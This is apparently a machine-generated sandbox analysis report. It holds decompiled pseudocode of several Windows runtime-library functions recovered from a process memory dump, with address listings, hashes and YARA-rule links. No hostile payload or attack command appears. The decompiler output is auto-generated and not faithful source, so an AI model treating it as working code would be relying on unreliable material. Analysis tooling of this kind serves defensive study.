											E04BC4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04B5EB70(_t95, 0x4c379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04B895D0();
											L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04B895D0();
											L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04B5EB70(_t93, 0x4c379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04B895D0();
										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04B895D0();
										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04B7F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                    0x04b452a5
                                                    0x04b452ad
                                                    0x04b452b0
                                                    0x04b452b3
                                                    0x04b452b7
                                                    0x04b452ba
                                                    0x04b452bf
                                                    0x04b452c4
                                                    0x04b452cc
                                                    0x00000000
                                                    0x00000000
                                                    0x04b452ce
                                                    0x04b452d9
                                                    0x04b452dd
                                                    0x04b452e7
                                                    0x04b452f7
                                                    0x04b452f9
                                                    0x04b452fd
                                                    0x04ba0dcf
                                                    0x04ba0dd5
                                                    0x04ba0dd6
                                                    0x04ba0dd7
                                                    0x04ba0dd8
                                                    0x04ba0dd9
                                                    0x04ba0dde
                                                    0x04ba0ddf
                                                    0x04ba0de0
                                                    0x04ba0de1
                                                    0x04ba0de2
                                                    0x04ba0de5
                                                    0x04ba0dea
                                                    0x04ba0dec
                                                    0x04ba0f60
                                                    0x04ba0f64
                                                    0x04ba0f70
                                                    0x04ba0f76
                                                    0x04ba0f79
                                                    0x04ba0f79
                                                    0x00000000
                                                    0x04ba0f64
                                                    0x04ba0df2
                                                    0x04ba0df7
                                                    0x04ba0e04
                                                    0x04ba0e0d
                                                    0x04ba0e0d
                                                    0x04ba0e10
                                                    0x04ba0e1a
                                                    0x04ba0e1c
                                                    0x04ba0e4c
                                                    0x04ba0e52
                                                    0x04ba0e61
                                                    0x04ba0e67
                                                    0x04ba0e6b
                                                    0x04ba0e70
                                                    0x04ba0e76
                                                    0x04ba0ed7
                                                    0x04ba0edc
                                                    0x04ba0ee0
                                                    0x04ba0ee6
                                                    0x04ba0eea
                                                    0x04ba0eed
                                                    0x04ba0ef0
                                                    0x04ba0ef3
                                                    0x04ba0ef6
                                                    0x04ba0ef9
                                                    0x04ba0efe
                                                    0x04ba0f01
                                                    0x04ba0f01
                                                    0x04ba0f0b
                                                    0x04ba0f12
                                                    0x04ba0f16
                                                    0x04ba0f18
                                                    0x04ba0f1b
                                                    0x04ba0f2c
                                                    0x04ba0f31
                                                    0x04ba0f31
                                                    0x04ba0f35
                                                    0x04ba0f39
                                                    0x04ba0f3a
                                                    0x04ba0f3c
                                                    0x04ba0f3f
                                                    0x04ba0f50
                                                    0x04ba0f55
                                                    0x04ba0f55
                                                    0x04ba0f59
                                                    0x04b452eb
                                                    0x04b452f1
                                                    0x04b452f1
                                                    0x04ba0e7d
                                                    0x04ba0e84
                                                    0x04ba0e88
                                                    0x04ba0e8a
                                                    0x04ba0e8d
                                                    0x04ba0e9e
                                                    0x04ba0ea3
                                                    0x04ba0ea3
                                                    0x04ba0ea7
                                                    0x04ba0eaf
                                                    0x04ba0eb3
                                                    0x04ba0eb9
                                                    0x04ba0eb9
                                                    0x04ba0ebc
                                                    0x04ba0ecd
                                                    0x04ba0ecd
                                                    0x00000000
                                                    0x04ba0eb3
                                                    0x04ba0e21
                                                    0x04ba0e2b
                                                    0x04ba0e2f
                                                    0x04ba0e30
                                                    0x04ba0e3a
                                                    0x04ba0e3f
                                                    0x04ba0e41
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba0e47
                                                    0x00000000
                                                    0x04ba0e47
                                                    0x04ba0df9
                                                    0x04ba0dfe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba0dfe
                                                    0x04b45303
                                                    0x04b45307
                                                    0x00000000
                                                    0x04b45309
                                                    0x00000000
                                                    0x04b45309
                                                    0x04b45307
                                                    0x04b452e9
                                                    0x04b452e9
                                                    0x00000000
                                                    0x04b452e9
                                                    0x04b4530e
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e6d8a60d2854a275487a7edb414e9f297f8820c52d4ff882679e4f6198de395
                                                    • Instruction ID: 44c1ed2f15f02d99d5add3b23f4426a456a754fa179647e36399d7fe51e27a4f
                                                    • Opcode Fuzzy Hash: 2e6d8a60d2854a275487a7edb414e9f297f8820c52d4ff882679e4f6198de395
                                                    • Instruction Fuzzy Hash: A851D071205741AFEB21EF24C840B27BBE4FF80718F1449AEE59597A50E774F850DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B72AE4, Relevance: .2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B72AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4c38204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4c38208; // 0x4c38207
				_t8 = _t57 + 0x4c38208; // 0x4c38207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4c38450; // 0xc93c80
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4c3821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4c36d5c; // 0x7f1e0654
							_t72 =  *0x4c36d5c; // 0x7f1e0654
							_t75 =  *0x4c36d5c; // 0x7f1e0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4c36d5c; // 0x7f1e0654
							_t84 =  *0x4c36d5c; // 0x7f1e0654
							_t87 =  *0x4c36d5c; // 0x7f1e0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04B8F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                    0x04b72ae4
                                                    0x04b72aec
                                                    0x04b72aef
                                                    0x04b72af4
                                                    0x04b72af7
                                                    0x04b72afd
                                                    0x04b72b92
                                                    0x04b72b92
                                                    0x04b72b97
                                                    0x04b72b9c
                                                    0x04b72b9c
                                                    0x04b72b03
                                                    0x04b72b06
                                                    0x04b72b09
                                                    0x04b72b09
                                                    0x04b72b0f
                                                    0x04b72b15
                                                    0x04b72b15
                                                    0x04b72b1b
                                                    0x04b72b1e
                                                    0x04b72b21
                                                    0x04b72b26
                                                    0x04b72b29
                                                    0x04b72b81
                                                    0x04b72b84
                                                    0x04b72c0e
                                                    0x04b72c15
                                                    0x04b72c24
                                                    0x04b72c24
                                                    0x04b72b8a
                                                    0x04b72b8a
                                                    0x04b72b8a
                                                    0x04b72b8a
                                                    0x04b72b90
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72b4a
                                                    0x04b72b4a
                                                    0x04b72b4d
                                                    0x04b72b53
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72b55
                                                    0x04b72b58
                                                    0x04b72bb7
                                                    0x04bb5d1b
                                                    0x04bb5d37
                                                    0x04bb5d47
                                                    0x04bb5d53
                                                    0x04b72bbd
                                                    0x04b72bbd
                                                    0x04b72bbd
                                                    0x04b72bb7
                                                    0x04b72b5d
                                                    0x04b72c2f
                                                    0x04bb5d5b
                                                    0x04bb5d77
                                                    0x04bb5d87
                                                    0x04bb5d93
                                                    0x04b72c35
                                                    0x04b72c35
                                                    0x04b72c35
                                                    0x04b72c2f
                                                    0x04b72b65
                                                    0x04b72b9f
                                                    0x04b72ba2
                                                    0x04b72b67
                                                    0x04b72b67
                                                    0x04b72b69
                                                    0x04b72b6b
                                                    0x04b72b6e
                                                    0x04b72bc9
                                                    0x04b72bcc
                                                    0x04b72bcf
                                                    0x04b72bd4
                                                    0x04b72bd6
                                                    0x04b72bd6
                                                    0x04b72bdb
                                                    0x04b72c02
                                                    0x04b72c05
                                                    0x04b72c07
                                                    0x00000000
                                                    0x04b72c07
                                                    0x04b72be0
                                                    0x04b72c00
                                                    0x04b72c3f
                                                    0x04b72c3f
                                                    0x00000000
                                                    0x04b72c00
                                                    0x04b72be5
                                                    0x04b72be7
                                                    0x04b72bec
                                                    0x04b72bf4
                                                    0x04b72bf6
                                                    0x00000000
                                                    0x04b72bf6
                                                    0x04b72b70
                                                    0x04b72b76
                                                    0x04b72b2b
                                                    0x04b72b2b
                                                    0x04b72b2d
                                                    0x04b72b2f
                                                    0x04b72b32
                                                    0x04b72b35
                                                    0x04b72b3a
                                                    0x00000000
                                                    0x04b72b40
                                                    0x04b72b43
                                                    0x04b72b45
                                                    0x04b72b47
                                                    0x04b72b4a
                                                    0x04b72b4d
                                                    0x04b72b53
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72b53
                                                    0x04b72b78
                                                    0x04b72b78
                                                    0x04b72b7b
                                                    0x04b72b7e
                                                    0x00000000
                                                    0x04b72b7e
                                                    0x04b72b76
                                                    0x04b72ba5
                                                    0x04b72ba5
                                                    0x04b72ba8
                                                    0x04b72bad
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72baf
                                                    0x04b72baf
                                                    0x04b72bc2
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 455d71482bcfdf23595ceaabd9a05acf1d05c82ec7cbccaa74ffe964a9c1dabb
                                                    • Instruction ID: fafb3e603beab7aced400da9f41e469e6e84ca4e1a93475c1a3cc095e4436d71
                                                    • Opcode Fuzzy Hash: 455d71482bcfdf23595ceaabd9a05acf1d05c82ec7cbccaa74ffe964a9c1dabb
                                                    • Instruction Fuzzy Hash: D3519D7AB00125CFCB28DF18C8909BDB7B1FB8870171585DAE866AB354E734BA51DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B6DBE9, Relevance: .1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E04B6DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04B4CC50(E04B44510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04B67D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04C18ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04B62280(_t58, _v44);
						E04B6DD82(_v44, _t102, _t98);
						E04B6B944(_t102, _v5);
						return E04B5FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4c38628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4c3862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4c38628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4c3862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4c0fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                    0x04b6dbe9
                                                    0x04b6dbf2
                                                    0x04b6dbf7
                                                    0x04b6dbf9
                                                    0x04b6dbfc
                                                    0x04b6dc00
                                                    0x04b6dc03
                                                    0x04b6dc14
                                                    0x04b6dd54
                                                    0x04b6dd54
                                                    0x04b6dd54
                                                    0x04b6dc18
                                                    0x04b6dc1d
                                                    0x04b6dc1d
                                                    0x04b6dc32
                                                    0x04b6dc3b
                                                    0x04b6dc3e
                                                    0x04b6dc46
                                                    0x04b6dd5b
                                                    0x04b6dd62
                                                    0x04b6dd64
                                                    0x04b6dd67
                                                    0x04b6dd69
                                                    0x04b6dd6b
                                                    0x04b6dd6e
                                                    0x04b6dd70
                                                    0x04b6dd73
                                                    0x04b6dd73
                                                    0x00000000
                                                    0x04b6dc4c
                                                    0x04b6dc4e
                                                    0x04bb3ae3
                                                    0x04bb3ae8
                                                    0x04bb3aea
                                                    0x04b6dce7
                                                    0x04b6dce9
                                                    0x04b6dcec
                                                    0x04b6dcee
                                                    0x04b6dcf0
                                                    0x04b6dcf3
                                                    0x04b6dcf5
                                                    0x04bb3af2
                                                    0x04bb3af5
                                                    0x04bb3af5
                                                    0x04b6dd06
                                                    0x04b6dd08
                                                    0x04b6dd0b
                                                    0x04b6dd12
                                                    0x04bb3b08
                                                    0x04b6dd18
                                                    0x04b6dd18
                                                    0x04b6dd18
                                                    0x04b6dd20
                                                    0x04b6dd23
                                                    0x04bb3b16
                                                    0x04bb3b16
                                                    0x04b6dd29
                                                    0x04b6dd2d
                                                    0x04b6dd36
                                                    0x04b6dd40
                                                    0x04b6dd51
                                                    0x04b6dd51
                                                    0x04b6dc54
                                                    0x04b6dc59
                                                    0x04b6dc59
                                                    0x04b6dc5e
                                                    0x04b6dc5e
                                                    0x04b6dc63
                                                    0x04b6dc66
                                                    0x04b6dc6b
                                                    0x04b6dc78
                                                    0x04b6dc7b
                                                    0x04b6dc81
                                                    0x04b6dc81
                                                    0x04b6dc83
                                                    0x04b6dc89
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6dd7b
                                                    0x04b6dd7b
                                                    0x04b6dc8f
                                                    0x04b6dc8f
                                                    0x04b6dc92
                                                    0x04b6dc99
                                                    0x04b6dc9f
                                                    0x04b6dca5
                                                    0x04b6dcaa
                                                    0x04b6dcaa
                                                    0x04b6dcb3
                                                    0x04b6dcb8
                                                    0x04b6dcbb
                                                    0x04b6dcc1
                                                    0x04b6dccf
                                                    0x04b6dcd2
                                                    0x04b6dcd5
                                                    0x04b6dcd7
                                                    0x04b6dcda
                                                    0x04b6dcdc
                                                    0x04b6dcdc
                                                    0x04b6dce2
                                                    0x04b6dce4
                                                    0x00000000
                                                    0x04b6dce4

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 341d5cc64674a32cf0cfb11fc93b60a7430e89450ae2fe3297b5aa05f758bb17
                                                    • Instruction ID: 66f3c85341bb7b805991882f86aa841602b9bbf4643971b9e37cb97899fe8248
                                                    • Opcode Fuzzy Hash: 341d5cc64674a32cf0cfb11fc93b60a7430e89450ae2fe3297b5aa05f758bb17
                                                    • Instruction Fuzzy Hash: 9B51BD71B01619DFCB14DF68C480AAEFBF9FB48310F20859AD956A7340EB79B944CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B5EF40, Relevance: .1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E04B5EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04B49080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04B42D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                    0x04b5ef4b
                                                    0x04b5ef4d
                                                    0x04b5ef57
                                                    0x04b5f0bd
                                                    0x04b5f0c2
                                                    0x04b5f0d2
                                                    0x04b5f0d2
                                                    0x04b5f0c2
                                                    0x04b5ef5d
                                                    0x04b5ef5f
                                                    0x04b5ef67
                                                    0x04b5ef6a
                                                    0x04b5ef6d
                                                    0x04b5ef74
                                                    0x04b5ef7f
                                                    0x04b5ef82
                                                    0x04b5ef82
                                                    0x04b5ef86
                                                    0x04b5ef88
                                                    0x04b5ef8c
                                                    0x04b5ef8f
                                                    0x04b5ef8f
                                                    0x04b5ef8f
                                                    0x00000000
                                                    0x04b5ef91
                                                    0x04b5ef93
                                                    0x04b5efc4
                                                    0x04b5efc4
                                                    0x04b5efc4
                                                    0x04b5efca
                                                    0x04b5efd0
                                                    0x04b5f0a6
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5f0af
                                                    0x04babb06
                                                    0x04babb0a
                                                    0x04b5f0b5
                                                    0x04b5f0b5
                                                    0x04b5f0b5
                                                    0x04b5f0b5
                                                    0x00000000
                                                    0x04b5efd6
                                                    0x04b5efd9
                                                    0x04b5f0de
                                                    0x04b5f0e2
                                                    0x04b5efdf
                                                    0x04b5efdf
                                                    0x04b5efdf
                                                    0x04b5efe5
                                                    0x04babafc
                                                    0x04babafc
                                                    0x04b5efe5
                                                    0x04b5efeb
                                                    0x04b5efed
                                                    0x04b5f00f
                                                    0x04b5f011
                                                    0x04b5f01a
                                                    0x04b5f01d
                                                    0x04b5f021
                                                    0x04b5f028
                                                    0x04b5f029
                                                    0x04b5f029
                                                    0x04b5f02c
                                                    0x00000000
                                                    0x04b5f02c
                                                    0x04b5eff3
                                                    0x04b5eff9
                                                    0x04b5f0ea
                                                    0x04b5f0ed
                                                    0x04b5f0ef
                                                    0x00000000
                                                    0x04b5f0ef
                                                    0x04b5f003
                                                    0x04babb12
                                                    0x04b5f045
                                                    0x04b5f049
                                                    0x04b5f051
                                                    0x04b5f09e
                                                    0x04b5f0a0
                                                    0x04b5f0a0
                                                    0x04b5f09e
                                                    0x04b5f053
                                                    0x04b5f064
                                                    0x04b5f064
                                                    0x04b5f06b
                                                    0x04babb1a
                                                    0x04babb1a
                                                    0x04b5f071
                                                    0x04b5f071
                                                    0x04b5f07d
                                                    0x04b5f082
                                                    0x04b5f08f
                                                    0x04b5f08f
